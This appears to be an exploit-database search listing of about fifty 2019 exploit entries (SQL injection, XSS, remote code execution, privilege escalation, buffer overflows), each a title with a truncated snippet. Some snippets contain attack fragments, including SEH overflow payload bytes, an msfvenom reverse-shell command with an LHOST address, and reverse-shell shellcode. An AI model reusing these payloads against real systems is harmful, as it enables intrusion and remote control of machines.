39001 matches found
Inventory Webapp - (itemquery) SQL injection Vulnerability
Exploit for php platform in category web applications Exploit Title: Inventory Webapp SQL injection Data: 05.09.2019 Exploit Author: mohammad zaheri Vendor HomagePage: https://github.com/edlangley/inventory-webapp Tested on: Windows Google Dork: N/A ========= Vulnerable Page: =========...
Linux/x86 TCP Reverse Shell 127.0.0.1 Nullbyte Free Shellcode
/ ; name : Exploit Title: Linux/x86 - TCP reverse shell 127.0.0.1 nullbyte free ; date : 04th sept, 2019 ; author : Sandro "guly" Zaccarini ; twitter : @theguly ; blog : https://gulyslae.github.io/ ; SLAE32 : SLAE-1037 ; purpose : the program will create a new connection to 127.0.0.1:4444 and...
FusionPBX 4.4.8 - Remote Code Execution Exploit
!/usr/bin/python3 ''' Exploit Title: FusionPBX v4.4.8 Remote Code Execution Exploit Author: Askar @mohammadaskar2 CVE : 2019-15029 Vendor Homepage: https://www.fusionpbx.com Software link: https://www.fusionpbx.com/download Version: v4.4.8 Tested on: Ubuntu 18.04 / PHP 7.2 ''' import requests fro...
Windows 10 UAC Protection Bypass Via Windows Store (WSReset.exe) And Registry Exploit
This Metasploit module exploits a flaw in the WSReset.exe file associated with the Windows Store. This binary has autoelevate privs, and it will run a binary file contained in a low-privilege registry location. By placing a link to the binary in the registry location, WSReset.exe will launch the...
FileThingie 2.5.7 - Arbitrary File Upload Vulnerability
Exploit for php platform in category web applications Exploit Title: FileThingie 2.5.7 - Arbitrary File Upload Author: Cakes Vendor Homepage: www.solitude.dk/filethingie Software Link: https://github.com/leefish/filethingie/archive/master.zip Tested Version: 2.5.7 Tested on OS: CentOS 7 CVE: N/A...
AwindInc SNMP Service - Command Injection Exploit
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule "AwindInc SNMP Service Command Injection", 'Description' = %q This module exploits a vulnerability found in AwindInc and OEM'ed products where...
WordPress Spryng Payments WooCommerce 1.6.7 Cross Site Scripting Vulnerability
Exploit for php platform in category web applications WordPress Spryng Payments WooCommerce 1.6.7 Cross Site Scripting Vulnerability Class Input Validation Error Remote Yes Credit Ricardo Sanchez Vulnerable Spryng payments woocommerce 1.6.7 Spryng payments woocommerce is prone to a reflected...
WordPress API Bearer Auth 20181229 Cross Site Scripting Vulnerability
Exploit for php platform in category web applications WordPress API Bearer Auth 20181229 Cross Site Scripting Vulnerability Class Input Validation Error Remote Yes Credit Ricardo Sanchez Vulnerable Api bearer auth 20181229 Api bearer auth is prone to a reflected cross-site scripting vulnerability...
DASAN Zhone ZNID GPON 2426A EU - Multiple Cross-Site Scripting Vulnerabilities
Exploit for hardware platform in category web applications Multiple Cross-Site Scripting XSS in the web interface of DASAN Zhone ZNID GPON 2426A EU version S3.1.285 application allows a remote attacker to execute arbitrary JavaScript via manipulation of an unsanitized GET parameters. Exploit Titl...
WordPress Download Manager 2.9.93 Plugin - Cross-Site Scripting Vulnerability
Exploit for php platform in category web applications Exploit Title: WordPress Download Manager Cross-site Scripting Exploit Author: ThuraMoeMyint Author Link: https://twitter.com/mgthuramoemyint Vendor Homepage: https://www.wpdownloadmanager.com Software Link:...
WordPress Portrait-Archiv.com Photostore 5.0.4 Cross Site Scripting Vulnerability
Exploit for php platform in category web applications WordPress Portrait-Archiv.com Photostore 5.0.4 Cross Site Scripting Vulnerability Class Input Validation Error Remote Yes Credit Ricardo Sanchez Vulnerable Portrait-Archiv.com Photostore 5.0.4 Portrait-Archiv.com is prone to a reflected...
Craft CMS 2.7.9/3.2.5 - Information Disclosure Vulnerability
Exploit for php platform in category web applications Exploit Title : CraftCms Users information disclosure From uploaded File Author Discovered By : Mohammed Abdul Raheem Author's Company Name : TrekShield IT Solution Vendor Homepage:https://craftcms.com/ Software Information Link:...
Microsoft Outlook Web Access Build 15.1.1591 Header Injection Exploit
Exploit for windows platform in category web applications !/usr/bin/perl -w Microsoft Outlook Web Access build:15.1.1591 Remote Header 'Host' Injection Exploit Copyright 2019 c Todor Donev Disclaimer: This or previous programs are for Educational purpose ONLY. Do not use it without permission. Th...
Cisco Data Center Network Manager Unauthenticated Remote Code Execution Exploit
DCNM exposes a file upload servlet FileUploadServlet at /fm/fileUpload. An authenticated user can abuse this servlet to upload a WAR to the Apache Tomcat webapps directory and achieve remote code execution as root. This module exploits two other vulnerabilities, CVE-2019-1619 for authentication...
IntelBras TELEFONE IP TIP200/200 LITE 60.61.75.15 - Arbitrary File Read Exploit
!/usr/bin/perl -w IntelBras TELEFONE IP TIP200/200 LITE 60.61.75.15 'dumpConfigFile' Pre-Auth Remote Arbitrary File Read Todor Donev 2019 c Disclaimer: This or previous programs are for Educational purpose ONLY. Do not use it without permission. The usual disclaimer applies, especially the fact...
Cisco Email Security Appliance (IronPort) C160 - (Host) Header Injection Exploit
!/usr/bin/perl -w Cisco Titsco Email Security Appliance IronPort C160 Header 'Host' Injection Copyright 2019 c Todor Donev Disclaimer: This or previous programs are for Educational purpose ONLY. Do not use it without permission. The usual disclaimer applies, especially the fact that Todor Donev i...
ktsuss Suid Privilege Escalation Exploit
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'ktsuss suid Privilege Escalation', 'Description' = %q This module attempts to gain root privileges by exploiting a vulnerability in ktsuss versio...
Cisco UCS Director Unauthenticated Remote Code Execution Exploit
The Cisco UCS Director virtual appliance contains two flaws that can be combined and abused by an attacker to achieve remote code execution as root. The first one, CVE-2019-1937, is an authentication bypass, that allows the attacker to authenticate as an administrator. The second one,...
Kaseya VSA agent 9.5 - Privilege Escalation Vulnerability
Exploit Title: Kaseya VSA agent CVE-2017-12410 found by Filip Palian. A a fix was put in place for the original CVE, however it was specific to binaries and not scripts. The root cause for both issues is allowing a low privileged group excessive permissions to a folder used by a elevated process...
Webmin 1.920 rpc.cgi Remote Root Exploit
This Metasploit module exploits Webmin versions 1.930 and below. This exploit takes advantage of a code execution issue within the function unserialisevariable located in web-lib-funcs.pl, in order to gain root. The only prerequisite is a valid session id. This module requires Metasploit:...
ChaosPro 3.1 - SEH Buffer Overflow Exploit
!C:\Python27\python.exe Title : ChaosPro 3.1 Twitter : @securitychops Blog Post : https://securitychops.com/2019/08/24/retro-exploit-series-episode-one-chaospro-3-1.html our egg! payload = "T00WT00W" adjust the stack from 00F2FFA6 to 00F2FFA8 payload += "\x83\xC4\x02" the payload payload +=...
Alkacon OpenCMS 10.5.x - Cross-Site Scripting Vulnerability
Exploit for multiple platform in category web applications Exploit Title: Alkacon OpenCMS 10.5.x - Multiple XSS in Apollo Template Exploit Author: Aetsu Vendor Homepage: http://www.opencms.org Software Link: https://github.com/alkacon/apollo-template Version: 10.5.x Tested on: 10.5.5 / 10.5.4 CVE...
Alkacon OpenCMS 10.5.x - Local File inclusion Vulnerability
Exploit for multiple platform in category web applications Exploit Title: Alkacon OpenCMS 10.5.x - Multiple LFI in Alkacon OpenCms Site Management Exploit Author: Aetsu Vendor Homepage: http://www.opencms.org Software Link: https://github.com/alkacon/opencms-core Version: 10.5.x Tested on: 10.5.5...
Cisco Email Security Appliance (IronPort) C150 - (Host) Header Injection Exploit
!/usr/bin/perl -w Cisco IronPort C150 Remote Header 'Host' Injection Copyright 2019 c Todor Donev Disclaimer: This or previous programs are for Educational purpose ONLY. Do not use it without permission. The usual disclaimer applies, especially the fact that Todor Donev is not liable for any...
ChaosPro 2.1 - SEH Buffer Overflow Exploit
!C:\Python27\python.exe Title : ChaosPro 2.1 Twitter : @securitychops Blog Post : https://securitychops.com/2019/08/24/retro-exploit-series-episode-one-chaospro-3-1.html our egg! payload = "T00WT00W" the payload payload += msfvenom -p windows/shellreversetcp LHOST=10.0.7.17 LPORT=4444 -e...
Opencart 3.x - Cross-Site Scripting Vulnerability
Exploit for php platform in category web applications Exploit Title: Opencart 3.x.x Authenticated Stored XSS Exploit Author: Nipun Somani Author Web: http://thehackerstore.net Vendor Homepage: https://www.opencart.com/ Software Link: https://github.com/opencart/opencart Version: 3.x.x Tested on:...
Wordpress Event Tickets 4.10.7.1 Plugin - CSV Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: WordPress Plugin Event Tickets = 4.10.7.1 - CSV Injection Google Dork: inurl:"\wp-content\plugins\event-tickets" Exploit Author: MTK http://mtk911.cf/ Vendor Homepage: https://tri.be/ Software Link:...
ChaosPro 2.0 - SEH Buffer Overflow Exploit
!C:\Python27\python.exe Title : ChaosPro 2.0 Twitter : @securitychops Blog Post : https://securitychops.com/2019/08/24/retro-exploit-series-episode-one-chaospro-3-1.html this needs to be a backwards jump to give us room to call stack jump code jmpback80 = "\x40\x75\x80\x75" jmpforward06 =...
Cisco RV110W / RV130(W) / RV215W Remote Command Execution Exploit
A vulnerability in the web-based management interface of the Cisco RV110W Wireless-N VPN Firewall, Cisco RV130W Wireless-N Multifunction VPN Router, and Cisco RV215W Wireless-N VPN Router could allow an unauthenticated, remote attacker to execute arbitrary code on an affected device. The...
ptrace Sudo Token Privilege Escalation Exploit
This Metasploit module attempts to gain root privileges by blindly injecting into the session user's running shell processes and executing commands by calling system, in the hope that the process has valid cached sudo tokens with root privileges. The system must have gdb installed and permit...
Alkacon OpenCMS 10.5.x - Cross-Site Scripting Vulnerability (2)
Exploit for multiple platform in category web applications Exploit Title: Alkacon OpenCMS 10.5.x - Multiple XSS in Alkacon OpenCms Site Management Exploit Author: Aetsu Vendor Homepage: http://www.opencms.org Software Link: https://github.com/alkacon/opencms-core Version: 10.5.x Tested on: 10.5.5...
Cisco UCS Director Default scpuser Password Exploit
This Metasploit module abuses a known default password on Cisco UCS Director. The 'scpuser' has the password of 'scpuser', and allows an attacker to login to the virtual appliance via SSH. This module has been tested with Cisco UCS Director virtual machines 6.6.0 and 6.7.0. Note that Cisco also...
SQL Server Password Changer 1.90 - Denial of Service Exploit
Exploit Title: SQL Server Password Changer v1.90 Denial of Service Exploit Vendor Homepage:https://www.top-password.com/ Exploit Author: Velayutham Selvaraj & Praveen Thiyagarayam TwinTech Solutions Tested Version: v2.10 Tested on: Windows 8 x64 Windows 7 x64 1.- Run python code :Outlook Password...
PilusCart 1.4.1 - Local File Disclosure Vulnerability
Exploit for php platform in category web applications Exploit Title: PilusCart = 1.4.1 - Local File Disclosure Exploit Author: Damian Ebelties https://zerodays.lol/ Vendor Homepage: https://sourceforge.net/projects/pilus/ Version: = 1.4.1 Tested on: Ubuntu 18.04.1 The e-commerce software...
VX Search Enterprise 10.4.16 - (User-Agent) Denial of Service Exploit
Exploit Title: VX Search Enterprise v10.4.16 DoS Exploit Author: James Chamberlain chumb0 Vendor Homepage: http://www.vxsearch.com/downloads.html Software Link: http://www.vxsearch.com/setups/vxsearchentsetupv10.4.16.exe Version: v10.4.16 Tested on: Windows 7 Home x86 CVE : N/A Have been unable t...
Zyxel NWA/NAP/WAC Hardcoded Credentials Vulnerability
An FTP service runs on the Zyxel wireless access point that contains the configuration file for the WiFi network. This FTP server can be accessed with hard-coded credentials that are embedded in the firmware of the AP. When the WiFi network is bound to another VLAN, an attacker can cross the...
Canon PRINT 2.5.5 - Information Disclosure Exploit
Exploit Title: Content Provider URI Injection on Canon PRINT 2.5.5 CVE-2019-14339 Date: 24th July, 2019 Exploit Author: 0x48piraj Vendor Homepage: https://www.usa.canon.com/internet/portal/us/home/explore/printing-innovations/mobile-printing/canon-print-app Software Link:...
YouPHPTube 7.4 - Remote Code Execution Vulnerability
Exploit for php platform in category web applications Exploit Title: YouPHPTube &webSiteTitle=Zerodays.lol&databaseHost=&databaseName=&databasePass=&databasePort=&databaseUser=" 0day.today 2019-12-04...
Zyxel USG/UAG/ATP/VPN/NXC External DNS Requests Vulnerability
Zyxel USG/UAG/ATP/VPN/NXC series suffer from an issue where a DNS request can be made by an unauthenticated attacker to either spam a DNS service of a third party with requests that have a spoofed origin or probe whether domain names are present on the internal network behind the firewall...
GGPowerShell / Windows PowerShell Remote Command Execution Exploit
This python script mints a .ps file with an exploitable semicolon condition that allows for command execution from Microsoft Windows PowerShell. from base64 import b64encode from base64 import b64decode from socket import import argparse,sys,socket,struct,re GGPowerShell Microsoft Windows...
Asus Precision TouchPad 11.0.0.25 - Denial of Service Exploit
!/usr/bin/python Exploit Title: Asus Precision TouchPad 11.0.0.25 - DoS/Privesc Exploit Author: Athanasios Tserpelis of Telspace Systems Vendor Homepage: https://www.asus.com Version: 11.0.0.25 Software Link : https://www.asus.com Contact: [email protected] Twitter: @telspacesystems Greets ...
Sentrifugo 3.2 - File Upload Restriction Bypass Vulnerability
Exploit for php platform in category web applications Exploit Title: Sentrifugo 3.2 - File Upload Restriction Bypass Exploit Author: creosote Vendor Homepage: http://www.sentrifugo.com/ Version: 3.2 Tested on: Ubuntu 18.04 CVE : CVE-2019-15813 Multiple File Upload Restriction Bypass vulnerabiliti...
WordPress WooCommerce Product Feed 2.2.18 Plugin - Cross-Site Scripting Vulnerability
Exploit for php platform in category web applications Exploit Title: WordPress Plugin WooCommerce Product Feed = 2.2.18 - Cross-Site Scripting Exploit Author: Damian Ebelties https://zerodays.lol/ Vendor Homepage: https://wordpress.org/plugins/webappick-product-feed-for-woocommerce/ Version: =...
QEMU - Denial of Service Exploit
include include include include include include include include include include include include include include include include include define diex do \ perrorx; \ exitEXITFAILURE; \ while0; // Constans define SRCADDR "10.0.2.15" define DSTADDR "10.0.2.2" define INTERFACE "ens3" define ETHHDRLEN ...
DomainMod 4.13 - Cross-Site Scripting Vulnerability
Exploit for php platform in category web applications Exploit Title: DomainMod = 4.13 - Cross-Site Scripting Exploit Author: Damian Ebelties https://zerodays.lol/ Vendor Homepage: https://domainmod.org/ Version: = 4.13 Tested on: Ubuntu 18.04.1 CVE: CVE-2019-15811 The software 'DomainMOD' is...
Easy MP3 Downloader 4.7.8.8 - (Unlock Code) Denial of Service Exploit
!/usr/bin/python SWAMI KARUPASAMI THUNAI print""" Exploit Title: Easy MP3 Downloader Denial of Service Date: 2019-08-29 Exploit Author: Mohan Ravichandran & Snazzy Sanoj Organization : StrongBox IT Vulnerable Software: Easy MP3 Downloader Version: 4.7.8.8 Software Link:...
Sentrifugo 3.2 - Persistent Cross-Site Scripting Vulnerability
Exploit for php platform in category web applications Exploit Title: Sentrifugo 3.2 - Persistent Cross-Site Scripting Exploit Author: creosote Vendor Homepage: http://www.sentrifugo.com/ Version: 3.2 Tested on: Ubuntu 18.04 CVE : CVE-2019-15814 Multiple Stored XSS vulnerabilities were found in...
WordPress GoURL.io Plugin < 1.4.14 - File Upload Exploit
Exploit for php platform in category web applications Shell link 0day.today 2019-12-04...
Jobberbase 2.0 - (subscribe) SQL Injection Exploit
Exploit for php platform in category web applications !/bin/bash Exploit Title: Jobberbase 2.0 - 'subscribe' SQL injection Exploit Author: Damian Ebelties https://zerodays.lol/ Vendor Homepage: http://www.jobberbase.com/ Version: 2.0 Tested on: Ubuntu 18.04.1 : ' The page "/subscribe/" is...
Webkit JSC: JIT - Uninitialized Variable Access in ArgumentsEliminationPhase::transform Exploit
https://github.com/WebKit/webkit/blob/94e868c940d46c5745869192d07255331d00102b/Source/JavaScriptCore/dfg/DFGArgumentsEliminationPhase.cppL743 case GetByVal: ... unsigned numberOfArgumentsToSkip = 0; if candidate-op == PhantomCreateRest numberOfArgumentsToSkip = candidate-numberOfArgumentsToSkip;...